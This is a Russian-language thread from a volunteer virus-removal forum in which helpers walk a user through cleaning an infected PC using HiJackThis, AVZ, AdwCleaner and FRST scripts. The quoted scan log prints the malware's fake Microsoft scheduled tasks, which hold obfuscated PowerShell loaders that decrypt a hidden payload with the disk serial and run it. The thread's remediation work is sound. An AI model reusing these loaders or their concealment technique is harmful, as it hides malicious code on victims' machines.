Что-то мешает активировать Nod32, в процессах бывает висит несколько COM Surrogate, периодические тормоза
Printable View
Что-то мешает активировать Nod32, в процессах бывает висит несколько COM Surrogate, периодические тормоза
Уважаемый(ая) [B]BEAN[/B], спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
HiJackThis (из каталога [B]autologger[/B])[URL=http://virusinfo.info/showthread.php?t=4491&p=64376&viewfull=1#post64376]профиксить[/URL]
[B]Важно[/B]: необходимо отметить и профиксить [B]только[/B] то, что указано ниже.
[CODE]
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8318D2C3-315D-449C-85C8-B63365682829}: [SuggestionsURL] = http://asp.assoc-amazon.co.uk/suggestions?q={searchTerms}&t=hp-uk1-vsb-21 - Amazon (UK) Search Suggestions
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8318D2C3-315D-449C-85C8-B63365682829}: [SuggestionsURL_JSON] = http://completion.amazon.co.uk/search/complete?method=completion&q={searchTerms}&search-alias=aps&client=amzn-search-suggestions/9fe582406fb5106f343a84083d78795713c12d68&mkt=3 - Amazon (UK) Search Suggestions
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8318D2C3-315D-449C-85C8-B63365682829}: [URL] = http://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk1-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms} - Amazon (UK) Search Suggestions
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00avg: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: \Microsoft\Windows\Maintenance\WinDAT - C:\WINDOWS\system32\cmd.exe /c dlhosts.exe || dlchosts.exe
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.vbs
O22 - Task: \Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler - {5AA199A0-1CED-43A5-9B85-3226086738A3} - (no file)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackup - C:\Program Files\Windows NT\Accessories\task.exe -c "$ddd = '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';iex('$'+'d=''Wm5WdVkzUnBiMjRnWkdWaktGdGllWFJsVzExZEpHTmlMQ0JiYzNSeWFXNW5YU1J3WVhOektYc2tjR0lnUFNCYlUzbHpkR1Z0TGxSbGVIUXVSVzVqYjJScGJtZGRPanBWVkVZNExrZGxkRUo1ZEdWektDUndZWE56S1Rza2N5QTlJQ1J3WWxzd1hUc2thajB3TzJadmNpZ2thU0E5SURBN0lDUnBJQzFzZENBa1kySXVRMjkxYm5RN0lDUnBLeXNwZTJsbUtDUnFJQzFuWlNBa2NHSXVRMjkxYm5RcGV5UnFQVEI5SUNSeklEMGdLREl6SUMxaVlXNWtJQ1J6SUMxaWIzSWdNVFV5S1NBdFluaHZjaUFrY3pza1kySmJKR2xkSUQwZ0pHTmlXeVJwWFNBdFluaHZjaUFrY0dKYkpHcGRJQzFpZUc5eUlDUnpPeVJxS3l0OWNtVjBkWEp1SUNSallqdDlKRzlpYWlBOUlHZDNiV2tnZDJsdU16SmZaR2x6YTJSeWFYWmxJSHdnZDJobGNtVWdleVJmTGtSbGRtbGpaVWxFSUMxbGNTQW5YRnd1WEZCSVdWTkpRMEZNUkZKSlZrVXdKMzBnZkNCelpXeGxZM1FnVFc5a1pXd3NJRk5sY21saGJHNTFiV0psY2pza1pDQTlJR1JsWXlBb1cxTjVjM1JsYlM1RGIyNTJaWEowWFRvNlJuSnZiVUpoYzJVMk5GTjBjbWx1Wnlna1pHUmtLU2tnS0NSdlltb3VUVzlrWld3Z0t5QW5JQ2NnS3lBa2IySnFMbE5sY21saGJHNTFiV0psY2lrN2FXVjRJQ2hwWlhnb0oxdFRlWE4wWlcwdVZHVjRkQzVGYm1OdlpHbHVaMTA2T2xWVVJqZ3VSMlYwSnlzblUzUnlhVzVuS0NSa0tTY3BLUT09'';for($z=2;$z--;){$'+'d=[Syst'+'em.Te'+'xt.Enco'+'ding]::U'+'TF'+4*2+'.Get'+'Str'+'ing([Sys'+'tem.Conv'+'ert]::From'+'Base6'+'4String($d))}$'+'d|i'+'ex;')" (Microsoft)
O22 - Task: \Microsoft\Windows\WindowsUpdate\WindowsUpdate - C:\Program Files\Windows NT\Accessories\task.exe -Command "$idd = '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';$u='ZnVuY3Rpb24gZGVjKFtieXRlW11dJGNiLCBbc3RyaW5nXSRwYXNzKXskcGIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRwYXNzKTskcyA9ICRwYlswXTskaj0wO2ZvcigkaSA9IDA7ICRpIC1sdCAkY2IuQ291bnQ7ICRpKyspe2lmKCRqIC1nZSAkcGIuQ291bnQpeyRqPTB9ICRzID0gKDIzIC1iYW5kICRzIC1ib3IgMTUyKSAtYnhvciAkczskY2JbJGldID0gJGNiWyRpXSAtYnhvciAkcGJbJGpdIC1ieG9yICRzOyRqKyt9cmV0dXJuICRjYjt9JG9iaiA9IGd3bWkgd2luMzJfZGlza2RyaXZlIHwgd2hlcmUgeyRfLkRldmljZUlEIC1lcSAnXFwuXFBIWVNJQ0FMRFJJVkUwJ30gfCBzZWxlY3QgTW9kZWwsIFNlcmlhbG51bWJlcjskZCA9IGRlYyAoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkaWRkKSkgKCRvYmouTW9kZWwgKyAnICcgKyAkb2JqLlNlcmlhbG51bWJlcik7aWV4IChpZXgoJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0JysnU3RyaW5nKCRkKScpKQ==';iex (iex('[System.Text.Encoding]::UTF8.Get'+'String([System.Convert]::From'+'Base64String($'+'u))'))" (Microsoft)
[/CODE]
AVZ [URL=http://virusinfo.info/showthread.php?t=7239&p=88804&viewfull=1#post88804]выполнить следующий скрипт[/URL].
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
[CODE]
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\ProgramData\Windows\Profile\1.vbs','');
QuarantineFileF('C:\ProgramData\Windows\Profile', '*.exe,*.dll,*.sys,*.vbs,*.com', false,'', 0, 0);
QuarantineFile('C:\WINDOWS\System32\drivers\sgx_driver.sys','');
QuarantineFile('C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys','');
TerminateProcessByName('c:\programdata\windows\profile\service.exe');
TerminateProcessByName('c:\programdata\windows\profile\dllhostn.exe');
QuarantineFile('c:\programdata\windows\profile\service.exe','');
QuarantineFile('c:\programdata\windows\profile\dllhostn.exe','');
DeleteFile('c:\programdata\windows\profile\1.vbs','32');
DeleteFile('c:\programdata\windows\profile\dllhostn.exe','32');
DeleteFile('c:\programdata\windows\profile\service.exe','32');
DeleteFile('C:\WINDOWS\system32\Tasks\Microsoft\Windows\Maintenance\WinDAT','64');
DeleteFile('C:\WINDOWS\system32\Tasks\Microsoft\Windows\Maintenance\WinNAT','64');
DeleteFile('C:\WINDOWS\system32\Tasks\Microsoft\Windows\WindowsBackup\WindowsBackup','64');
DeleteFile('C:\WINDOWS\system32\Tasks\Microsoft\Windows\WindowsUpdate\WindowsUpdate','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
[/CODE]
После выполнения скрипта компьютер перезагрузится.
После перезагрузки:
- Выполните в AVZ:
[CODE]
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
[/CODE]
Файл quarantine.zip из папки AVZ загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
- Подготовьте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]AdwCleaner[/URL] и приложите его в теме.
лог AdwCleaner
[url=https://virusinfo.info/showthread.php?t=218752&p=1480599&viewfull=1#post1480599]Удалите в AdwCleaner[/url] всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
после очистки
- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"Driver MD5"[/i].
[img]http://i.imgur.com/B92LqRQ.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
Farbar Recovery Scan Tool
[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
File: C:\Windows\Temp\DPTF\esif_assist_64.exe
Zip: C:\Windows\Temp\DPTF\esif_assist_64.exe;C:\Users\Public\VOIP.dat;C:\Users\Public\ASR.dat
CHR HKU\S-1-5-21-112483496-312038891-3396409129-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
File: C:\WINDOWS\system32\DRIVERS\libusb0.sys
File: C:\WINDOWS\system32\drivers\pmxdrv.sys
File: C:\WINDOWS\System32\drivers\sgx_driver.sys
File: C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys
File: C:\Users\Public\VOIP.dat
File: C:\Users\Public\ASR.dat
Task: {59B23D75-C759-4418-B806-A2925CAF7E58} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {FCB3E3B8-4BA4-48B8-94C1-796C98329D47} - \YCMServiceAgent -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:6A0A47E7 [254]
AlternateDataStreams: C:\ProgramData\Temp:AB366971 [118]
AlternateDataStreams: C:\ProgramData\Temp:C78DADEA [192]
AlternateDataStreams: C:\ProgramData\Temp:DBC3D477 [120]
AlternateDataStreams: C:\ProgramData\Temp:E3615992 [336]
AlternateDataStreams: C:\ProgramData\Temp:F89F2593 [236]
AlternateDataStreams: C:\Users\Все пользователи\Temp:6A0A47E7 [254]
AlternateDataStreams: C:\Users\Все пользователи\Temp:AB366971 [118]
AlternateDataStreams: C:\Users\Все пользователи\Temp:C78DADEA [192]
AlternateDataStreams: C:\Users\Все пользователи\Temp:DBC3D477 [120]
AlternateDataStreams: C:\Users\Все пользователи\Temp:E3615992 [336]
AlternateDataStreams: C:\Users\Все пользователи\Temp:F89F2593 [236]
FirewallRules: [UDP Query User{23125829-413C-4A76-B463-00C199EDD891}C:\games\battlefield 1\bf1.exe] => (Allow) C:\games\battlefield 1\bf1.exe No File
FirewallRules: [TCP Query User{3F837DEE-0C97-4F90-8C65-29AC0CC43017}C:\games\battlefield 1\bf1.exe] => (Allow) C:\games\battlefield 1\bf1.exe No File
FirewallRules: [UDP Query User{6382CB3F-808A-41B6-BFF8-B6D6584444B9}C:\alta\zapoln.exe] => (Allow) C:\alta\zapoln.exe No File
FirewallRules: [TCP Query User{1EB06887-31C3-463A-A181-8F904B122559}C:\alta\zapoln.exe] => (Allow) C:\alta\zapoln.exe No File
FirewallRules: [UDP Query User{F3EF54B4-9E7C-49B2-9B4C-04D452D81534}C:\alta\ordview.exe] => (Allow) C:\alta\ordview.exe No File
FirewallRules: [TCP Query User{76BA048F-7E17-409E-B5D8-35CD0BE509F8}C:\alta\ordview.exe] => (Allow) C:\alta\ordview.exe No File
FirewallRules: [{2223D56E-9C7E-4D2A-9A42-C0687721B2E1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe No File
FirewallRules: [{73E4E58C-7162-4134-A3A9-ABA41D7155F6}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe No File
FirewallRules: [UDP Query User{E9944B77-1A1E-4140-8F32-F59ED278D5AF}C:\alta\gtdw.exe] => (Allow) C:\alta\gtdw.exe No File
FirewallRules: [TCP Query User{3C9EA790-BF21-40C8-9A5C-95939A23086F}C:\alta\gtdw.exe] => (Allow) C:\alta\gtdw.exe No File
FirewallRules: [UDP Query User{C356C847-0407-4869-AF31-BAF10E6AEA84}C:\alta\taxwin.exe] => (Allow) C:\alta\taxwin.exe No File
FirewallRules: [TCP Query User{2F985895-00F4-4956-8924-104CD88E8351}C:\alta\taxwin.exe] => (Allow) C:\alta\taxwin.exe No File
FirewallRules: [{DEAAC9BA-8F16-46DE-8E31-BA96D885BAA9}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe No File
FirewallRules: [{2A944834-3CA6-49C7-900C-807FCE460A54}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe No File
FirewallRules: [{12D32647-774D-4179-84B3-83EE3451948E}] => (Allow) C:\ProgramData\Windows\Profile\host.exe ()
FirewallRules: [{50F015B7-FD7B-4CBB-8F39-62B23F5F7BA8}] => (Allow) C:\ProgramData\Windows\Profile\host.exe ()
FirewallRules: [{BD6C5A93-A61F-4186-8C14-2AC66E6DE8A6}] => (Allow) C:\ProgramData\Windows\Profile\winlogin.exe ()
FirewallRules: [{DCDED3FE-D090-43CD-BC85-8D9646B61D63}] => (Allow) C:\ProgramData\Windows\Profile\winlogin.exe ()
Folder: C:\ProgramData\Windows\Profile
Reboot:
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
На рабочем столе образуется карантин вида [B]<date>.zip[/B] загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
fixlog
[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
2018-12-20 20:35 - 2018-12-16 04:57 - 006115840 ____A [8F093512E24CA0F69CB22314E3F07520] () C:\ProgramData\Windows\Profile\host.exe
Zip: C:\ProgramData\Windows\Profile\cef.pak;C:\ProgramData\Windows\Profile\config.json;C:\ProgramData\Windows\Profile\msacm32.dll
2018-12-20 20:31 - 2018-12-20 20:35 - 047450513 ____A [25B6553E09BA7F6AD84CF897ADD16F52] (Igor Pavlov) C:\ProgramData\Windows\Profile\upw.exe
2018-12-20 20:36 - 2018-12-16 04:59 - 001760768 ____A [615B95E67F1AF0C42C722FECCE53F096] () C:\ProgramData\Windows\Profile\winlogin.exe
Reboot:
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
Уточните пожалуйста Вам знакомы следующие файлы?
[CODE]C:\Users\Public\VOIP.dat
C:\Users\Public\ASR.dat[/CODE]
Уточните пожалуйста Вам знакомы следующие файлы?
[CODE]C:\Users\Public\VOIP.dat
C:\Users\Public\ASR.dat[/CODE][/QUOTE]
Нет, не знакомы.
[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
C:\Users\Public\VOIP.dat
C:\Users\Public\ASR.dat
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер возможно будет [b]перезагружен[/b].[/LIST]
сообщите, что с проблемой?
Субъективно скорость работы стала быстрее, Nod 32 удалось активировать лицензию.
проверьте пожалуйста ПК утилитой [URL="https://www.kaspersky.com/downloads/thank-you/free-virus-removal-tool"]KVRT[/URL], Чтобы убедиться, что не осталось остатков от вредоносного ПО.
Ok. Nod на это время отключить?
[QUOTE=BEAN;1494750]Ok. Nod на это время отключить?[/QUOTE]
как хотите, обычно не влияет на работу антивируса Nod32.
P.S. Угрозы которые будут в карантине можете не удалять, например C:\FRST\Quarantine, C:\AdwCleaner\ и т.п.
[ATTACH=CONFIG]675913[/ATTACH]
Уточните пожалуйста, вы нажимали изменить настройку и указывали мой компьютер или интересующие диски?
P.S. похоже, что проверка проходила только памяти и критических областях. Так как активных угроз в логах не было найдено, он и ничего не нашел. Но возможно в системе присутствует мусор, т.е. остатки.
Настроек не менял